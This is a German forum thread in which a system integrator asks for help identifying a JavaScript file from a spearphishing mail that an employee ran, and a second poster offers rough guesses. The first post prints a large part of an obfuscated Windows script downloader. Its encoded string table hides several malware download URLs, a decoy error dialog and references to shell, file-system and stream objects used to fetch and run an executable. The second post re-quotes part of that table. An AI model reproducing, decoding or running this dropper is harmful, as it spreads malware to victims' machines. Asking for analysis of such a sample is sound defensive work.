Javascript Malware

#1
Guten Abend, vor ein paar Tagen tauchte in einer Spearphishing-Mail, die einer unserer Mitarbeiter erhielt, dieser Schadcode auf, den er leider auch ausführte.
Kann mir jemand ungefähr sagen, worum es sich dabei handelt? Ich selbst bin Systemintegrator und hier hört meine Kompetenz leider absolut auf.

Ich kann (leider) nicht den ganzen Code anhängen, das wäre zu lang mit 738 Zeilen, aber ich hänge ihn als txt an.
Danke schon einmal für sämtliche Vorschläge oder Ideen.




// String table of the obfuscator runtime. Every entry is a hex-escaped base64
// string; nothing in it is readable until runtime. The IIFE that follows
// rotates the array in place (0xbf = 191 shift/push steps), and b() below
// base64-decodes entries lazily by index. The cleartext strings (COM ProgIDs,
// method names, the five download URLs — entries starting "aHR0cDov" are
// base64 "http://" — and the decoy dialog text) are therefore never present
// in the file as written. The decoded program is given in post #6 of this
// thread; the URLs are deliberately not decoded here.
var a = ['\x56\x58\x6c\x50\x56\x31\x63\x3d', '\x64\x6d\x78\x54\x53\x6d\x67\x3d', '\x59\x6d\x78\x77\x59\x6c\x45\x3d', '\x5a\x48\x46\x71\x52\x30\x38\x3d', '\x65\x6c\x6c\x7a\x62\x57\x49\x3d', '\x62\x58\x68\x42\x56\x6d\x6f\x3d', '\x59\x57\x68\x34\x56\x30\x49\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x64\x79\x5a\x57\x46\x30\x4c\x6d\x4e\x73\x4c\x32\x39\x79\x64\x48\x56\x36\x59\x58\x49\x75\x59\x32\x77\x76\x4d\x56\x39\x42\x59\x53\x38\x3d', '\x61\x30\x70\x77\x52\x57\x34\x3d', '\x57\x55\x5a\x53\x5a\x6b\x45\x3d', '\x56\x56\x70\x54\x53\x33\x55\x3d', '\x53\x48\x52\x61\x53\x33\x6b\x3d', '\x57\x45\x52\x6c\x56\x31\x6f\x3d', '\x51\x57\x74\x77\x5a\x47\x49\x3d', '\x62\x46\x68\x44\x57\x6d\x63\x3d', '\x55\x6e\x64\x70\x56\x30\x63\x3d', '\x5a\x56\x42\x56\x54\x56\x41\x3d', '\x51\x6c\x4a\x79\x57\x57\x30\x3d', '\x59\x31\x64\x4a\x52\x6b\x6b\x3d', '\x61\x6d\x64\x4d\x51\x58\x6f\x3d', '\x54\x30\x64\x6a\x65\x48\x67\x3d', '\x55\x32\x68\x61\x63\x46\x6b\x3d', '\x65\x56\x42\x6d\x55\x57\x30\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x64\x79\x5a\x69\x35\x6d\x63\x69\x39\x6a\x63\x33\x4d\x76\x53\x31\x39\x31\x54\x79\x38\x3d', '\x52\x45\x46\x4f\x64\x58\x67\x3d', '\x56\x48\x4e\x6d\x51\x31\x59\x3d', '\x4e\x48\x77\x77\x66\x44\x56\x38\x4d\x58\x77\x79\x66\x44\x4e\x38\x4e\x33\x77\x32', '\x54\x47\x31\x71\x63\x46\x59\x3d', '\x56\x46\x4a\x6b\x59\x6b\x59\x3d', '\x55\x31\x4a\x74\x62\x6d\x45\x3d', '\x59\x57\x70\x51\x56\x31\x49\x3d', '\x53\x32\x56\x5a\x56\x57\x63\x3d', '\x59\x6e\x52\x69\x62\x46\x59\x3d', '\x52\x6b\x4e\x78\x54\x6d\x6b\x3d', '\x56\x46\x70\x4d\x52\x33\x55\x3d', '\x54\x58\x4a\x30\x52\x55\x55\x3d', '\x5a\x48\x4a\x75\x64\x58\x63\x3d', '\x56\x56\x56\x5a\x52\x55\x6f\x3d', '\x62\x31\x46\x4e\x62\x58\x41\x3d', '\x54\x57\x6c\x30\x52\x6e\x59\x3d', '\x61\x56\x64\x57\x65\x6c\x41\x3d', '\x54\x48\x6c\x45\x59\x56\x55\x3d', '\x63\x56\x4e\x36\x55\x57\x6b\x3d', '\x57\x45\x5a\x59\x55\x46\x55\x3d', '\x57\x6b\x46\x5a\x5a\x58\x55\x3d', '\x62\x47\x64\x50\x61\x33\x41\x3d', 
'\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x35\x6c\x65\x48\x56\x7a\x61\x57\x35\x6d\x62\x33\x49\x75\x59\x32\x39\x74\x4c\x32\x6c\x74\x5a\x79\x39\x45\x58\x30\x4d\x76', '\x5a\x30\x70\x6b\x56\x57\x34\x3d', '\x56\x6b\x4a\x69\x51\x57\x63\x3d', '\x61\x30\x68\x6f\x64\x55\x51\x3d', '\x65\x48\x46\x47\x53\x6d\x6f\x3d', '\x54\x30\x52\x57\x62\x30\x67\x3d', '\x5a\x48\x6c\x69\x64\x58\x67\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x56\x6b\x59\x57\x35\x6b\x64\x48\x4a\x70\x63\x32\x67\x75\x59\x32\x39\x74\x4c\x32\x4a\x73\x64\x57\x55\x76\x4e\x6c\x39\x6b\x4c\x77\x3d\x3d', '\x59\x32\x64\x72\x54\x48\x4d\x3d', '\x62\x57\x35\x4f\x64\x45\x49\x3d', '\x56\x57\x4a\x72\x64\x6c\x55\x3d', '\x52\x31\x64\x78\x55\x6d\x4d\x3d', '\x52\x58\x42\x78\x61\x47\x6b\x3d', '\x52\x45\x6c\x69\x63\x6d\x59\x3d', '\x62\x48\x70\x7a\x65\x55\x55\x3d', '\x51\x56\x4e\x31\x61\x31\x6b\x3d', '\x54\x48\x4e\x32\x56\x6b\x51\x3d', '\x57\x46\x6c\x42\x55\x30\x4d\x3d', '\x62\x6c\x4e\x34\x62\x6c\x41\x3d', '\x62\x45\x46\x54\x51\x56\x45\x3d', '\x64\x46\x6c\x4d\x55\x6d\x4d\x3d', '\x61\x32\x70\x73\x52\x6d\x63\x3d', '\x62\x33\x52\x72\x59\x6d\x51\x3d', '\x63\x33\x42\x73\x61\x58\x51\x3d', '\x54\x33\x42\x6c\x62\x67\x3d\x3d', '\x56\x33\x4a\x70\x64\x47\x55\x3d', '\x55\x47\x39\x7a\x61\x58\x52\x70\x62\x32\x34\x3d', '\x55\x32\x46\x32\x5a\x56\x52\x76\x52\x6d\x6c\x73\x5a\x51\x3d\x3d', '\x56\x48\x6c\x77\x5a\x51\x3d\x3d', '\x51\x32\x78\x76\x63\x32\x55\x3d', '\x57\x6b\x39\x73\x56\x45\x34\x3d', '\x57\x57\x35\x53\x5a\x48\x51\x3d', '\x53\x6c\x68\x51\x57\x6d\x51\x3d', '\x63\x55\x46\x31\x52\x32\x38\x3d', '\x59\x55\x39\x4b\x5a\x56\x59\x3d', '\x59\x57\x78\x33\x52\x6b\x55\x3d', '\x62\x6c\x56\x36\x61\x31\x4d\x3d', '\x54\x56\x46\x6d\x59\x56\x6b\x3d', '\x55\x58\x68\x48\x53\x31\x6b\x3d', '\x56\x33\x64\x73\x54\x48\x41\x3d', '\x65\x47\x74\x47\x57\x57\x30\x3d', '\x62\x31\x56\x33\x57\x6b\x51\x3d', '\x56\x32\x5a\x6f\x53\x6e\x49\x3d', '\x57\x6c\x6c\x46\x55\x56\x49\x3d', '\x5a\x32\x56\x4d\x63\x33\x4d\x3d', '\x61\x46\x56\x4f\x61\x32\x6b\x3d', 
'\x5a\x55\x6c\x46\x65\x6b\x59\x3d', '\x5a\x6c\x70\x32\x56\x32\x6b\x3d', '\x64\x45\x31\x5a\x55\x47\x4d\x3d', '\x56\x57\x35\x76\x59\x56\x49\x3d', '\x59\x6b\x56\x6e\x52\x30\x34\x3d', '\x63\x33\x68\x6c\x61\x47\x63\x3d', '\x64\x56\x42\x75\x55\x47\x59\x3d', '\x51\x55\x64\x33\x5a\x57\x67\x3d', '\x64\x55\x5a\x71\x61\x32\x67\x3d', '\x51\x6b\x4a\x72\x63\x6b\x38\x3d', '\x54\x32\x68\x43\x64\x56\x6b\x3d', '\x51\x57\x35\x50\x63\x30\x34\x3d', '\x59\x6c\x46\x6b\x52\x56\x6b\x3d', '\x55\x31\x46\x48\x64\x47\x63\x3d', '\x54\x6c\x6c\x75\x62\x6d\x6b\x3d', '\x54\x6d\x31\x76\x51\x57\x6f\x3d', '\x56\x46\x70\x78\x61\x45\x77\x3d', '\x53\x6c\x4a\x7a\x63\x56\x63\x3d', '\x51\x6b\x74\x47\x52\x45\x6f\x3d', '\x65\x6e\x46\x47\x54\x47\x67\x3d', '\x5a\x32\x56\x69\x59\x32\x6b\x3d', '\x51\x30\x78\x79\x53\x55\x55\x3d', '\x51\x6d\x4a\x58\x5a\x30\x34\x3d', '\x5a\x33\x6c\x71\x63\x48\x67\x3d', '\x62\x6d\x39\x4d\x62\x32\x38\x3d', '\x61\x32\x6c\x32\x61\x45\x45\x3d', '\x62\x56\x46\x79\x52\x48\x41\x3d', '\x63\x6b\x4a\x69\x53\x47\x77\x3d', '\x56\x6d\x35\x70\x53\x30\x59\x3d', '\x55\x57\x64\x49\x55\x57\x30\x3d', '\x64\x45\x5a\x73\x55\x45\x51\x3d', '\x54\x47\x5a\x42\x63\x6e\x6b\x3d', '\x51\x55\x52\x6b\x52\x6e\x49\x3d', '\x61\x6e\x5a\x77\x59\x58\x51\x3d', '\x57\x47\x39\x4b\x54\x55\x6b\x3d', '\x63\x57\x39\x55\x55\x32\x77\x3d', '\x59\x58\x64\x50\x64\x48\x6b\x3d', '\x56\x47\x70\x32\x55\x6e\x51\x3d', '\x53\x58\x5a\x34\x64\x31\x6b\x3d', '\x5a\x57\x46\x75\x52\x48\x6f\x3d', '\x5a\x47\x31\x55\x62\x6b\x6f\x3d', '\x63\x6d\x46\x75\x5a\x47\x39\x74', '\x64\x47\x39\x54\x64\x48\x4a\x70\x62\x6d\x63\x3d', '\x63\x33\x56\x69\x63\x33\x52\x79', '\x52\x32\x56\x30\x55\x33\x42\x6c\x59\x32\x6c\x68\x62\x45\x5a\x76\x62\x47\x52\x6c\x63\x67\x3d\x3d', '\x52\x6d\x70\x46\x54\x56\x67\x3d', '\x63\x48\x4e\x7a\x55\x47\x4d\x3d', '\x56\x32\x31\x50\x62\x6d\x77\x3d', '\x59\x55\x5a\x32\x64\x6e\x41\x3d', '\x5a\x32\x74\x70\x54\x30\x30\x3d', '\x63\x57\x78\x6d\x52\x56\x45\x3d', '\x56\x47\x31\x79\x53\x55\x55\x3d', '\x65\x6e\x4e\x54\x5a\x47\x30\x3d', 
'\x53\x48\x4e\x6c\x55\x30\x55\x3d', '\x57\x6e\x4a\x4c\x61\x6e\x51\x3d', '\x59\x6c\x46\x55\x61\x56\x55\x3d', '\x65\x6c\x6c\x78\x5a\x57\x77\x3d', '\x5a\x31\x56\x46\x64\x45\x30\x3d', '\x64\x46\x68\x76\x52\x56\x55\x3d', '\x52\x58\x4a\x43\x57\x6b\x6b\x3d', '\x52\x56\x42\x59\x62\x6d\x34\x3d', '\x54\x6b\x46\x30\x65\x48\x41\x3d', '\x59\x33\x42\x7a\x63\x46\x67\x3d', '\x63\x58\x70\x49\x64\x48\x41\x3d', '\x62\x6b\x74\x56\x54\x48\x49\x3d', '\x52\x6c\x68\x4b\x64\x6e\x59\x3d', '\x5a\x55\x52\x71\x62\x47\x4d\x3d', '\x52\x55\x5a\x71\x61\x56\x6f\x3d', '\x53\x30\x78\x5a\x62\x55\x45\x3d', '\x63\x6b\x6c\x44\x53\x47\x55\x3d', '\x63\x58\x68\x71\x63\x56\x55\x3d', '\x64\x31\x4a\x6b\x51\x57\x30\x3d', '\x65\x47\x78\x79\x63\x55\x51\x3d', '\x53\x6b\x52\x30\x57\x6c\x41\x3d', '\x64\x6e\x64\x5a\x61\x56\x67\x3d', '\x64\x6b\x35\x5a\x56\x30\x34\x3d', '\x53\x47\x5a\x59\x57\x6c\x67\x3d', '\x5a\x48\x5a\x48\x65\x45\x59\x3d', '\x56\x56\x52\x72\x57\x6c\x6b\x3d', '\x53\x30\x74\x54\x59\x6b\x51\x3d', '\x65\x55\x74\x6a\x55\x45\x55\x3d', '\x63\x56\x68\x32\x5a\x47\x73\x3d', '\x54\x57\x46\x44\x61\x31\x63\x3d', '\x4e\x33\x77\x7a\x66\x44\x46\x38\x4e\x48\x77\x31\x66\x44\x42\x38\x4e\x6e\x77\x79', '\x64\x33\x4e\x48\x63\x6d\x63\x3d', '\x51\x32\x64\x56\x63\x32\x4d\x3d', '\x64\x46\x6c\x36\x63\x45\x4d\x3d', '\x62\x30\x5a\x70\x54\x32\x51\x3d', '\x4d\x48\x77\x7a\x66\x44\x46\x38\x4e\x58\x77\x79\x66\x44\x51\x3d', '\x55\x46\x4a\x76\x62\x30\x63\x3d', '\x64\x6e\x42\x55\x52\x45\x49\x3d', 
'\x56\x47\x68\x6c\x63\x6d\x55\x67\x64\x32\x46\x7a\x49\x47\x46\x75\x49\x47\x56\x79\x63\x6d\x39\x79\x49\x47\x39\x77\x5a\x57\x35\x70\x62\x6d\x63\x67\x64\x47\x68\x70\x63\x79\x42\x6b\x62\x32\x4e\x31\x62\x57\x56\x75\x64\x43\x34\x67\x56\x47\x68\x6c\x49\x47\x5a\x70\x62\x47\x55\x67\x61\x58\x4d\x67\x5a\x47\x46\x74\x59\x57\x64\x6c\x5a\x43\x42\x68\x62\x6d\x51\x67\x59\x32\x39\x31\x62\x47\x51\x67\x62\x6d\x39\x30\x49\x47\x4a\x6c\x49\x48\x4a\x6c\x63\x47\x46\x70\x63\x6d\x56\x6b\x49\x43\x68\x6d\x62\x33\x49\x67\x5a\x58\x68\x68\x62\x58\x42\x73\x5a\x53\x77\x67\x61\x58\x51\x67\x64\x32\x46\x7a\x49\x48\x4e\x6c\x62\x6e\x51\x67\x59\x58\x4d\x67\x59\x57\x34\x67\x5a\x57\x31\x68\x61\x57\x77\x67\x59\x58\x52\x30\x59\x57\x4e\x6f\x62\x57\x56\x75\x64\x43\x42\x68\x62\x6d\x51\x67\x64\x32\x46\x7a\x62\x69\x64\x30\x49\x47\x4e\x76\x63\x6e\x4a\x6c\x59\x33\x52\x73\x65\x53\x42\x6b\x5a\x57\x4e\x76\x5a\x47\x56\x6b\x4b\x53\x34\x3d', '\x63\x30\x70\x72\x53\x31\x4d\x3d', '\x57\x47\x35\x4b\x55\x33\x6b\x3d', '\x51\x6e\x56\x31\x63\x58\x55\x3d', '\x54\x6d\x39\x30\x49\x46\x4e\x31\x63\x48\x42\x76\x63\x6e\x52\x6c\x5a\x43\x42\x47\x61\x57\x78\x6c\x49\x45\x5a\x76\x63\x6d\x31\x68\x64\x41\x3d\x3d', '\x51\x6e\x70\x48\x54\x31\x45\x3d', '\x55\x47\x39\x77\x64\x58\x41\x3d', '\x51\x33\x4a\x6c\x59\x58\x52\x6c\x54\x32\x4a\x71\x5a\x57\x4e\x30', '\x53\x45\x52\x46\x56\x32\x73\x3d', '\x53\x6d\x56\x72\x5a\x58\x6f\x3d', '\x56\x31\x4e\x6a\x63\x6d\x6c\x77\x64\x43\x35\x54\x61\x47\x56\x73\x62\x41\x3d\x3d', '\x64\x30\x56\x58\x55\x6b\x67\x3d', '\x52\x6c\x4a\x75\x62\x6d\x30\x3d', '\x64\x47\x64\x4b\x52\x32\x55\x3d', '\x62\x57\x4e\x77\x51\x6b\x49\x3d', '\x55\x45\x68\x46\x53\x6d\x77\x3d', '\x54\x56\x4e\x59\x54\x55\x77\x79\x4c\x6c\x68\x4e\x54\x45\x68\x55\x56\x46\x41\x3d', '\x53\x33\x70\x5a\x52\x55\x55\x3d', '\x52\x30\x56\x55', '\x65\x48\x4e\x36\x64\x58\x49\x3d', '\x61\x45\x4a\x6e\x5a\x57\x59\x3d', '\x65\x6e\x52\x44\x56\x31\x4d\x3d', '\x51\x58\x52\x68\x63\x56\x59\x3d', '\x57\x55\x5a\x6f\x65\x55\x77\x3d', '\x52\x45\x64\x55\x51\x6c\x67\x3d', 
'\x64\x47\x56\x54\x63\x6b\x49\x3d', '\x56\x6d\x6c\x4e\x57\x46\x63\x3d', '\x57\x6e\x5a\x4c\x52\x58\x67\x3d', '\x54\x6b\x64\x33\x65\x48\x63\x3d', '\x52\x57\x39\x55\x5a\x46\x6f\x3d', '\x5a\x55\x68\x30\x57\x6c\x6b\x3d', '\x62\x33\x42\x6c\x62\x67\x3d\x3d', '\x63\x32\x56\x75\x5a\x41\x3d\x3d', '\x63\x33\x52\x68\x64\x48\x56\x7a', '\x55\x6d\x56\x7a\x63\x47\x39\x75\x63\x32\x56\x43\x62\x32\x52\x35', '\x55\x6e\x56\x75', '\x59\x30\x78\x75\x64\x48\x4d\x3d', '\x56\x58\x42\x58\x57\x58\x6b\x3d', '\x54\x46\x5a\x79\x63\x48\x41\x3d', '\x56\x33\x42\x6c\x62\x6b\x77\x3d', '\x55\x32\x4e\x79\x61\x58\x42\x30\x61\x57\x35\x6e\x4c\x6b\x5a\x70\x62\x47\x56\x54\x65\x58\x4e\x30\x5a\x57\x31\x50\x59\x6d\x70\x6c\x59\x33\x51\x3d', '\x53\x57\x52\x70\x53\x30\x51\x3d', '\x59\x6b\x52\x61\x55\x47\x6b\x3d', '\x61\x33\x4e\x75\x56\x6b\x4d\x3d', '\x4c\x6d\x56\x34\x5a\x51\x3d\x3d', '\x62\x47\x56\x4b\x53\x33\x6f\x3d', '\x4e\x6e\x77\x7a\x66\x44\x46\x38\x4d\x6e\x77\x31\x66\x44\x42\x38\x4e\x48\x77\x33', '\x54\x31\x64\x79\x52\x32\x38\x3d', '\x51\x55\x52\x50\x52\x45\x49\x75\x55\x33\x52\x79\x5a\x57\x46\x74', '\x64\x45\x4e\x74\x59\x57\x55\x3d', '\x62\x6b\x68\x46\x64\x45\x38\x3d', '\x64\x6d\x70\x73\x54\x56\x51\x3d', '\x5a\x57\x70\x33\x53\x6c\x45\x3d', '\x64\x30\x4a\x4d\x52\x47\x34\x3d', '\x63\x6b\x70\x72\x5a\x45\x38\x3d', '\x53\x57\x31\x49\x61\x46\x67\x3d', '\x57\x55\x64\x72\x52\x46\x49\x3d', '\x52\x6e\x46\x49\x62\x58\x55\x3d', '\x55\x30\x4a\x57\x55\x32\x59\x3d', '\x65\x6b\x5a\x68\x54\x55\x55\x3d', '\x54\x56\x52\x44\x62\x58\x59\x3d', '\x62\x48\x68\x61\x52\x58\x45\x3d', '\x61\x48\x52\x74\x64\x47\x34\x3d', '\x64\x6c\x42\x75\x53\x47\x30\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x31\x6c\x61\x57\x74\x7a\x4c\x6d\x52\x72\x4c\x31\x5a\x45\x59\x6c\x51\x74\x62\x6c\x6c\x66\x61\x56\x70\x34\x63\x55\x34\x74\x5a\x6b\x46\x34\x4c\x32\x64\x68\x58\x7a\x67\x76', '\x52\x45\x74\x77\x56\x6e\x4d\x3d', '\x62\x47\x68\x6f\x61\x6b\x63\x3d', '\x64\x6c\x70\x70\x65\x48\x45\x3d', '\x64\x48\x64\x31\x55\x57\x51\x3d', 
'\x62\x57\x39\x6d\x5a\x6d\x63\x3d', '\x54\x56\x68\x74\x52\x46\x63\x3d', '\x5a\x31\x64\x4c\x52\x30\x6b\x3d', '\x54\x55\x68\x51\x65\x6e\x6b\x3d', '\x64\x32\x52\x6f\x61\x47\x45\x3d', '\x63\x48\x56\x75\x63\x47\x51\x3d', '\x59\x57\x31\x46\x63\x46\x51\x3d', '\x51\x33\x42\x5a\x51\x32\x77\x3d', '\x53\x6d\x70\x30\x63\x55\x45\x3d', '\x5a\x58\x64\x44\x54\x58\x51\x3d', '\x53\x6b\x5a\x6e\x5a\x33\x51\x3d', '\x54\x57\x46\x50\x59\x6c\x63\x3d', '\x64\x45\x4e\x36\x52\x6e\x6b\x3d'];
// Array-rotation step of the obfuscator runtime: rotates the string table
// `a` left by 0xbf (191) positions so that the indices b('0x..') uses below
// line up with the shuffled order. c is the table, d the rotation count.
// Pure bookkeeping — it carries no behaviour of its own, but a static scan
// for the cleartext strings will miss them until this has run.
(function(c, d) {
var e = function(f) {
// `--f` stops at 0, so the body runs f-1 times; f arrives as d+1, i.e. 191 steps.
while (--f) {
c['push'](c['shift']());
}
};
e(++d);
}(a, 0xbf));
// String decoder used for every literal in this script: b('0x..') returns
// the plaintext of a[index] (base64 → UTF-8), memoised on b.xoXtXA.
// This is a stock obfuscator runtime, not application logic; what matters
// for analysis is which indices the code below asks it for.
// The second argument d is accepted but never used in this variant.
var b = function(c, d) {
c = c - 0x0; // coerce the hex string index ('0x17') to a number
var e = a[c];
if (b['EalNRN'] === undefined) { // one-time initialisation of the decoder
(function() {
var f;
try {
// Obtain the global object without naming it; `window` is only the browser fallback.
var g = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');');
f = g();
} catch (h) {
f = window;
}
var i = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
// Polyfill atob() for script hosts that do not provide it (the WSH/JScript
// engine this sample runs under has no native atob).
f['atob'] || (f['atob'] = function(j) {
var k = String(j)['replace'](/=+$/, ''); // drop base64 padding
for (var l = 0x0, m, n, o = 0x0, p = ''; n = k['charAt'](o++); ~n && (m = l % 0x4 ? m * 0x40 + n : n, l++ % 0x4) ? p += String['fromCharCode'](0xff & m >> (-0x2 * l & 0x6)) : 0x0) {
n = i['indexOf'](n);
}
return p;
});
}());
// base64 → byte string → %XX-encoded → decodeURIComponent, i.e. base64 to UTF-8 text.
b['hVXgdv'] = function(q) {
var r = atob(q);
var s = [];
for (var t = 0x0, u = r['length']; t < u; t++) {
s += '%' + ('00' + r['charCodeAt'](t)['toString'](0x10))['slice'](-0x2);
}
return decodeURIComponent(s);
};
b['xoXtXA'] = {}; // decode cache, keyed by table index
b['EalNRN'] = !![]; // "initialised" flag (!![] === true)
}
var v = b['xoXtXA'][c];
if (v === undefined) {
e = b['hVXgdv'](e);
b['xoXtXA'][c] = e;
} else {
e = v;
}
return e;
};

/**
 * Obfuscated form of the get_url(url, callback) shown deobfuscated in post #6:
 * a synchronous HTTP GET through an XMLHTTP COM object.
 *
 * v  - the URL to fetch
 * w  - callback(body, error): receives (responseBody, false) on HTTP 200 and
 *      (null, true) on any other status or on an exception.
 *
 * x is a dispatch table: decoded string constants plus trivial wrappers such
 * as function(B, C, D) { return B(C, D); }. The if-conditions that compare a
 * value with itself are opaque predicates (always true for ===, always false
 * for !==), so only one branch of each if/else can ever execute; the other
 * branches are dead code inserted by the obfuscator. Index-to-name mappings
 * in the comments below follow post #6 and were not re-derived here.
 */
function u(v, w) {
var x = {};
x[b('0x0')] = function(y, z, A) {
return y(z, A);
};
x[b('0x1')] = b('0x2');
x[b('0x3')] = function(B, C, D) {
return B(C, D);
};
x[b('0x4')] = function(E, F) {
return E === F;
};
x[b('0x5')] = b('0x6');
x[b('0x7')] = b('0x8');
x[b('0x9')] = b('0xa');
x[b('0xb')] = function(G, H) {
return G == H;
};
x[b('0xc')] = function(I, J) {
return I === J;
};
x[b('0xd')] = b('0xe');
x[b('0xf')] = b('0x10');
x[b('0x11')] = b('0x12');
x[b('0x13')] = function(K, L, M) {
return K(L, M);
};
x[b('0x14')] = function(N, O) {
return N !== O;
};
x[b('0x15')] = b('0x16');
try {
if (x[b('0x4')](x[b('0x5')], x[b('0x5')])) { // opaque predicate: always true
var P = new ActiveXObject(x[b('0x7')]); // XMLHTTP COM object (post #6: 'MSXML2.XMLHTTP')
P[b('0x17')](x[b('0x9')], v, ![]); // open(method, url, async = false) — blocking request
P[b('0x18')](); // send()
if (x[b('0xb')](P[b('0x19')], 0xc8)) { // status == 200
if (x[b('0xc')](x[b('0xd')], x[b('0xd')])) { // always true
return x[b('0x3')](w, P[b('0x1a')], ![]); // callback(responseBody, false)
} else {
return ![]; // unreachable
}
} else {
// Both branches do the same thing: callback(null, true).
if (x[b('0xc')](x[b('0xf')], x[b('0x11')])) {
return x[b('0x0')](w, null, !![]);
} else {
return x[b('0x13')](w, null, !![]);
}
}
} else {
// Dead code: never reached, and `error` / `path` are not defined in this scope.
if (!error) {
try {
var p = new ActiveXObject(x[b('0x1')]);
p[b('0x1b')](path);
} catch (U) {}
}
}
} catch (V) {
// Any COM or network failure (including an exception thrown by the callback
// itself, since it is invoked inside the try) ends up here.
if (x[b('0x14')](x[b('0x15')], x[b('0x15')])) { // always false (!== on the same value)
return x[b('0x3')](w, P[b('0x1a')], ![]); // unreachable
} else {
return x[b('0x13')](w, null, !![]); // callback(null, true)
}
}
}
 


beepsoft

#2
Hallo,
also ich bin jetzt auch in keiner Weise mit Ahnung versehen.
Aber ganz grob auf den ersten Blick:
Code:
 var P = new ActiveXObject(x[b('0x7')]);
Ich vermute, dass hier ein Zugriff auf die Festplatte passiert.
Code:
     Res = WshShell[b('0x107')](Text, 0x0, Title, dK[b('0x102')](0x0, 0x40));
Hier wird ein Fenster erzeugt.
Also gibt es irgendeine Art von Interface.
Code:
return decodeURIComponent(s);
Hier wird vermutlich etwas verschlüsselt.
Code:
var a = ['\x56\x58\x6c\x50\x56\x31\x63\x3d', '\x64\x6d\x78\x54\x53\x6d\x67\x3d', '\x59\x6d\x78\x77\x59\x6c\x45\x3d', '\x5a\x48\x46\x71\x52\x30\x38\x3d', '\x65\x6c\x6c\x7a\x62\x57\x49\x3d', '\x62\x58\x68\x42\x56\x6d\x6f\x3d', '\x59\x57\x68\x34\x56\x30\x49\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x64\x79\x5a\x57\x46\x30\x4c\x6d\x4e\x73\x4c\x32\x39\x79\x64\x48\x56\x36\x59\x58\x49\x75\x59\x32\x77\x76\x4d\x56\x39\x42\x59\x53\x38\x3d', '\x61\x30\x70\x77\x52\x57\x34\x3d', '\x57\x55\x5a\x53\x5a\x6b\x45\x3d', '\x56\x56\x70\x54\x53\x33\x55\x3d', '\x53\x48\x52\x61\x53\x33\x6b\x3d', '\x57\x45\x52\x6c\x56\x31\x6f\x3d', '\x51\x57\x74\x77\x5a\x47\x49\x3d', '\x62\x46\x68\x44\x57\x6d\x63\x3d', '\x55\x6e\x64\x70\x56\x30\x63\x3d', '\x5a\x56\x42\x56\x54\x56\x41\x3d', '\x51\x6c\x4a\x79\x57\x57\x30\x3d', '\x59\x31\x64\x4a\x52\x6b\x6b\x3d', '\x61\x6d\x64\x4d\x51\x58\x6f\x3d', '\x54\x30\x64\x6a\x65\x48\x67\x3d', '\x55\x32\x68\x61\x63\x46\x6b\x3d', '\x65\x56\x42\x6d\x55\x57\x30\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x64\x79\x5a\x69\x35\x6d\x63\x69\x39\x6a\x63\x33\x4d\x76\x53\x31\x39\x31\x54\x79\x38\x3d', '\x52\x45\x46\x4f\x64\x58\x67\x3d', '\x56\x48\x4e\x6d\x51\x31\x59\x3d', '\x4e\x48\x77\x77\x66\x44\x56\x38\x4d\x58\x77\x79\x66\x44\x4e\x38\x4e\x33\x77\x32', '\x54\x47\x31\x71\x63\x46\x59\x3d', '\x56\x46\x4a\x6b\x59\x6b\x59\x3d', '\x55\x31\x4a\x74\x62\x6d\x45\x3d', '\x59\x57\x70\x51\x56\x31\x49\x3d', '\x53\x32\x56\x5a\x56\x57\x63\x3d', '\x59\x6e\x52\x69\x62\x46\x59\x3d', '\x52\x6b\x4e\x78\x54\x6d\x6b\x3d', '\x56\x46\x70\x4d\x52\x33\x55\x3d', '\x54\x58\x4a\x30\x52\x55\x55\x3d', '\x5a\x48\x4a\x75\x64\x58\x63\x3d', '\x56\x56\x56\x5a\x52\x55\x6f\x3d', '\x62\x31\x46\x4e\x62\x58\x41\x3d', '\x54\x57\x6c\x30\x52\x6e\x59\x3d', '\x61\x56\x64\x57\x65\x6c\x41\x3d', '\x54\x48\x6c\x45\x59\x56\x55\x3d', '\x63\x56\x4e\x36\x55\x57\x6b\x3d', '\x57\x45\x5a\x59\x55\x46\x55\x3d', '\x57\x6b\x46\x5a\x5a\x58\x55\x3d', '\x62\x47\x64\x50\x61\x33\x41\x3d', 
'\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x35\x6c\x65\x48\x56\x7a\x61\x57\x35\x6d\x62\x33\x49\x75\x59\x32\x39\x74\x4c\x32\x6c\x74\x5a\x79\x39\x45\x58\x30\x4d\x76', '\x5a\x30\x70\x6b\x56\x57\x34\x3d', '\x56\x6b\x4a\x69\x51\x57\x63\x3d', '\x61\x30\x68\x6f\x64\x55\x51\x3d', '\x65\x48\x46\x47\x53\x6d\x6f\x3d', '\x54\x30\x52\x57\x62\x30\x67\x3d', '\x5a\x48\x6c\x69\x64\x58\x67\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x56\x6b\x59\x57\x35\x6b\x64\x48\x4a\x70\x63\x32\x67\x75\x59\x32\x39\x74\x4c\x32\x4a\x73\x64\x57\x55\x76\x4e\x6c\x39\x6b\x4c\x77\x3d\x3d', '\x59\x32\x64\x72\x54\x48\x4d\x3d', '\x62\x57\x35\x4f\x64\x45\x49\x3d', '\x56\x57\x4a\x72\x64\x6c\x55\x3d', '\x52\x31\x64\x78\x55\x6d\x4d\x3d', '\x52\x58\x42\x78\x61\x47\x6b\x3d', '\x52\x45\x6c\x69\x63\x6d\x59\x3d', '\x62\x48\x70\x7a\x65\x55\x55\x3d', '\x51\x56\x4e\x31\x61\x31\x6b\x3d', '\x54\x48\x4e\x32\x56\x6b\x51\x3d', '\x57\x46\x6c\x42\x55\x30\x4d\x3d', '\x62\x6c\x4e\x34\x62\x6c\x41\x3d', '\x62\x45\x46\x54\x51\x56\x45\x3d', '\x64\x46\x6c\x4d\x55\x6d\x4d\x3d', '\x61\x32\x70\x73\x52\x6d\x63\x3d', '\x62\x33\x52\x72\x59\x6d\x51\x3d', '\x63\x33\x42\x73\x61\x58\x51\x3d', '\x54\x33\x42\x6c\x62\x67\x3d\x3d', '\x56\x33\x4a\x70\x64\x47\x55\x3d', 